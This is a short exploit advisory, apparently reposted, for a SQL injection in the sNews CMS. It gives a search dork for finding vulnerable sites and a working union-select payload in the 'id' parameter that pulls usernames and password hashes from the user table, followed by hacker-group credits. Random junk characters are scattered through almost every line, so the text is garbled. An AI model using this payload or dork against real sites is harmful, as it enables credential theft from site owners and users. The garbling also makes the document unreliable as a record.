标题: CMS snews SQL Injection Vulnerability
' n# L9 T( c( f7 q" B# v作者: By onestree
% S# ]# d( M, r) H8 L% h下载地址 : http://snewscms.com/
( x" a" b& B! }8 W+ O测试平台 : ubuntu 12.10 / win 7
/ f! I: p5 U: r关键词: inurl:"tanyakan pada rumput yang bergoyang"! r* S. e/ u" Q* {; `
" T2 h$ i6 z6 j# ^% N9 g+ A2 g
0 ~8 N( I# _: I' ~*************************************************************
+ G; o' E2 v2 b # E$ D( ?1 ~3 j4 g) l! t
SQL poc:
' f4 I% o- H& ?# f ( G3 p& }5 s8 G+ h9 q |
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
. F4 F) |; l" J0 `. S : q1 A) T& ]& ?3 p6 w0 e2 V
示例( r. m* G I1 u4 E( }# N7 t C' f+ G" ]
0 h3 r; Z2 F/ l$ r3 c0 }http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*& e0 ~6 Q; H+ E" C! G* x
5 |' n& W5 V5 H1 \8 L: p2 d# c3 T
" V0 |" B5 A {: I7 s; @致谢:
: E G9 N% e+ _, G3 B 7 h& R5 y( w2 j- n8 x1 d
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
" Q% f. K1 \' Y4 n6 w: o- I2 ] / f/ ^# v- Q5 t, b7 v0 W
indonesiancoder - moeslimh4x0r - go-coder
( M" L3 p5 V" f; v$ `9 y0 L
* V5 S, M/ D( U8 V lspesial my hunny :*6 U* o6 e/ |% [+ v/ t
|